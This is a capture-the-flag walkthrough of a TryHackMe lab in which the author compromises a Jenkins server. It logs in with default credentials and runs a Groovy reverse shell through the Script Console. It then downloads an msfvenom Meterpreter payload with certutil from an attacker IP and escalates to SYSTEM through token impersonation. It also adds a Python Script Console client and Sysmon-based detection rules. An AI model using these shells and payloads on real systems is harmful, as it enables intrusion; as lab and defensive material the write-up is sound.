This walkthrough covers the Alfred room on TryHackMe. The objective is to exploit a misconfigured Jenkins server, obtain a reverse shell, and escalate privileges by abusing SeImpersonatePrivilege on a low-privileged user to obtain NT AUTHORITY\SYSTEM level privileges.
Step 1: Nmap
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 17:33 MDT
Nmap scan report for alfred.thm (10.10.70.88)
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows Server 2008 R2 SP1 (87%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.82 seconds
From this scan, we identified three open ports: 80 (IIS 7.5), 3389 (RDP; Nmap reports it as tcpwrapped because the service closed the connection before the probes could identify it), and 8080 (Jetty, the embedded servlet container Jenkins runs on, with the default Jenkins robots.txt disallowing everything). The OS guesses point at Windows 7 / Server 2008 R2, which matters later because it tells us what kind of box we are escalating on.
Port 80 serves a bare IIS page with no title. Port 8080 is the Jenkins login page.
Step 2: Logging In
Trying some default credentials on the Jenkins login page at port 8080, we discover that admin:admin works. Weak credentials on a CI server are the misconfiguration this room is built around: anyone who can log in as an administrator can run code on the server.
Step 3: Initial Foothold
Looking around the instance, we find the Script Console (Manage Jenkins > Script Console, served at /script), which runs arbitrary Groovy on the Jenkins host with the privileges of the Jenkins service account. This will be our way into the box.
We're using the Groovy reverse shell from PayloadsAllTheThings. The host and port below are the template's placeholders: replace them with your attacker IP and a port you're already listening on (for example nc -lvnp 4242) before running it.
String host = "10.0.0.1";   // attacker IP (placeholder)
int port = 4242;            // port your listener is on (placeholder)
String cmd = "cmd.exe";     // shell to spawn on the Windows target

Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump bytes between the shell process and the socket until either side goes away
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
Running this script inside the built-in Script Console makes the Jenkins host connect back to our listener and drops us into a cmd.exe shell running as the Jenkins service user.
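The Script Console is just an HTTP endpoint, which is what makes a weak Jenkins login so dangerous: anyone with the credentials can drive it from a script instead of the browser form, and that is also what a defender should expect to see in the access logs. The following is an added example (not code from the original walkthrough, and not Jenkins' own client) that posts a Groovy script to Jenkins' /scriptText endpoint with basic auth, fetching a CSRF crumb from /crumbIssuer first when the instance hands one out. The URL, the admin:admin credentials and the whoami probe are the walkthrough's values used as placeholders; the HTTP transport is injectable so the crumb-and-post logic can be exercised offline against a fake server.

```python
"""Drive the Jenkins Script Console over HTTP instead of the browser form.

Added example for this walkthrough, not Jenkins' own code. Jenkins exposes
the console as POST /scriptText (form parameter `script`, plain-text result).
When CSRF protection is on, a POST also needs a crumb fetched from
/crumbIssuer/api/json and echoed back in the header named by
`crumbRequestField`; when it is off, /crumbIssuer answers 404. Which Jenkins
versions insist on the crumb for basic-auth requests varies, so the client
simply sends one whenever it can get one.
"""
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

# Placeholders taken from the walkthrough (assumed, not a live target).
JENKINS_URL = "http://alfred.thm:8080"
USERNAME = "admin"
PASSWORD = "admin"

# Harmless first probe: who does Jenkins run as? That decides what a reverse
# shell from the console would get you.
WHOAMI_GROOVY = 'println("whoami /priv".execute().text)'


def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def urllib_transport(url, data=None, headers=None):
    """Real transport: returns (status, body_bytes); data=None means GET."""
    req = urllib.request.Request(url, data=data, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def get_crumb(base_url, auth, transport):
    """Return {header_name: crumb}, or {} when CSRF protection is disabled."""
    status, body = transport(f"{base_url}/crumbIssuer/api/json", None, auth)
    if status == 404:
        return {}
    if status != 200:
        raise RuntimeError(f"crumb fetch failed with HTTP {status}")
    doc = json.loads(body)
    return {doc["crumbRequestField"]: doc["crumb"]}


def run_groovy(script, base_url=JENKINS_URL, user=USERNAME, password=PASSWORD,
               transport=urllib_transport):
    """POST `script` to /scriptText and return the console output as text."""
    auth = basic_auth_header(user, password)
    headers = {**auth, **get_crumb(base_url, auth, transport),
               "Content-Type": "application/x-www-form-urlencoded"}
    data = urllib.parse.urlencode({"script": script}).encode()
    status, body = transport(f"{base_url}/scriptText", data, headers)
    if status == 403:
        # Either the user lacks Overall/RunScripts or the crumb was rejected.
        raise PermissionError("script console denied (missing RunScripts "
                              "permission or rejected crumb)")
    if status != 200:
        raise RuntimeError(f"/scriptText returned HTTP {status}")
    return body.decode(errors="replace")


if __name__ == "__main__":
    print(run_groovy(WHOAMI_GROOVY))
```

The same function will happily ship the reverse-shell script above, but the whoami probe is the better first move: if the console already runs as SYSTEM there is no privilege escalation to do, and if RunScripts is denied you find out from a clean 403 rather than a hung listener. On the defensive side, POSTs to /script or /scriptText from an IP that never loads the Jenkins UI are exactly the requests worth alerting on.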
From here we find our user.txt flag located in C:\Users\bruce\Desktop\.
Step 4: Upgrade to Meterpreter Shell
First, we generate the payload with msfvenom. LHOST is the attacker's IP and LPORT is the port the handler will listen on; both are baked into the executable, so they must match the handler exactly:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.28.215 LPORT=1335 --format exe -o payload.exe
Serve the file from the attacker box (for example python3 -m http.server 8000 in the directory containing payload.exe), then from the victim shell use certutil, a built-in that can fetch files over HTTP, to download it into the current directory:
certutil.exe -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
Now we fire up msfconsole and set up a handler to catch the connection, using the same LHOST and LPORT as above:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.13.28.215
set LPORT 1335
exploit
Once payload.exe is run on the victim (just type payload.exe in the existing shell), the handler catches the connection and drops us into a Meterpreter session.
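For the defensive side of the same chain: everything done so far leaves a recognisable trail in process-creation telemetry, namely Jenkins' java.exe spawning cmd.exe (the Groovy shell), certutil pulling a file over HTTP, and a fresh executable running out of the Jenkins directory. The following added example (not code from the original walkthrough) runs three such rules over constructed Sysmon-style Event ID 1 records. The log lines, the Jenkins install path and the user names are made up to mirror the steps on this page; the field names (Image, ParentImage, CommandLine, User) are Sysmon's, flattened here as key=value pairs separated by "|" for convenience.

```python
"""Detection rules for the Jenkins foothold chain, over constructed Sysmon-style
process-creation (Event ID 1) records.  Added example, not part of the
original walkthrough; every record below is made up to match its steps."""
import ntpath

# Constructed sample telemetry (not real logs). One record per line.
SAMPLE_LOG = r"""
User=NT AUTHORITY\NETWORK SERVICE|ParentImage=C:\Program Files (x86)\Jenkins\jenkins.exe|Image=C:\Program Files (x86)\Jenkins\jre\bin\java.exe|CommandLine=java -jar jenkins.war
User=alfred\bruce|ParentImage=C:\Program Files (x86)\Jenkins\jre\bin\java.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe
User=alfred\bruce|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil.exe -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe
User=alfred\bruce|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -hashfile C:\build\out.zip SHA256
User=alfred\bruce|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\whoami.exe|CommandLine=whoami /priv
User=alfred\bruce|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Program Files (x86)\Jenkins\payload.exe|CommandLine=payload.exe
"""

# Assumed install location of the Jenkins service on the target.
JENKINS_HOME = r"c:\program files (x86)\jenkins"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
JENKINS_OWN_BINARIES = {"java.exe", "jenkins.exe"}


def parse_record(line):
    """'k=v|k=v' -> dict; the first '=' splits, so values may contain '='."""
    rec = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def basename(path):
    # ntpath handles backslash paths correctly even when run on Linux.
    return ntpath.basename(path).lower()


def rule_jenkins_spawned_shell(rec):
    """Jenkins' JVM starting an interactive shell: Script Console abuse."""
    return (basename(rec.get("ParentImage", "")) == "java.exe"
            and basename(rec.get("Image", "")) in SHELLS)


def rule_certutil_download(rec):
    """certutil used as a downloader; '/urlcache' and '-urlcache' both count."""
    cmd = rec.get("CommandLine", "").lower().replace("/", "-")
    return (basename(rec.get("Image", "")) == "certutil.exe"
            and "-urlcache" in cmd and "http" in cmd)


def rule_exe_in_jenkins_home(rec):
    """An executable that is not Jenkins' own running out of its install dir."""
    image = rec.get("Image", "").lower()
    return (image.startswith(JENKINS_HOME)
            and basename(image) not in JENKINS_OWN_BINARIES)


RULES = {
    "jenkins_spawned_shell": rule_jenkins_spawned_shell,
    "certutil_download": rule_certutil_download,
    "exe_in_jenkins_home": rule_exe_in_jenkins_home,
}


def scan(log_text):
    """Return a list of (rule_name, user, command_line) for every hit."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        for name, rule in RULES.items():
            if rule(rec):
                alerts.append((name, rec.get("User", ""), rec.get("CommandLine", "")))
    return alerts


if __name__ == "__main__":
    for name, user, cmd in scan(SAMPLE_LOG):
        print(f"[{name}] {user}: {cmd}")
```

The first rule is the noisy one: Jenkins legitimately runs cmd.exe for "Execute Windows batch command" build steps, so in production it needs tuning on the build agents or on the parent command line rather than being applied to every java.exe. The certutil rule is the cheap win; on a CI host that never needs certutil to fetch anything over HTTP, blocking it outright beats alerting on it.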
Step 5: Privesc
Let's see what privileges we currently have by typing whoami /priv (from Meterpreter, drop into a shell first).
Nice. We have SeImpersonatePrivilege. This is not a vulnerability in itself: it is a privilege normally granted to service accounts (the Jenkins service user here) that lets the holder impersonate the tokens of other users, which means any token we can get our hands on becomes usable. We can take advantage of this with the incognito module built into Metasploit: load incognito, then list_tokens -g to see which group tokens are available.
Next, we want to impersonate the Administrators token. We can do this by typing the following command: impersonate_token "BUILTIN\Administrators". Note that the meterpreter console treats the backslash as an escape character, so type it as BUILTIN\\Administrators.
Even with the higher-privileged token, getuid may still report the old user. Windows decides what a process may do from its primary token, not the impersonated one, so we migrate into a process that already runs as SYSTEM. The safest bet is always the services.exe process.
View processes:
ps
Find the PID of services.exe and migrate into it:
migrate <PID>
Now that we're successfully NT AUTHORITY\SYSTEM (confirm with getuid), let's find our root flag and complete this room.
This room was a great introduction to Windows pentesting. After going through this, I realized I have a long way ahead of me until I feel comfortable enough to sit down for the PNPT certification by TCM Security. I hope you enjoyed this walkthrough of the Alfred room found on TryHackMe, and as always, Happy Hacking.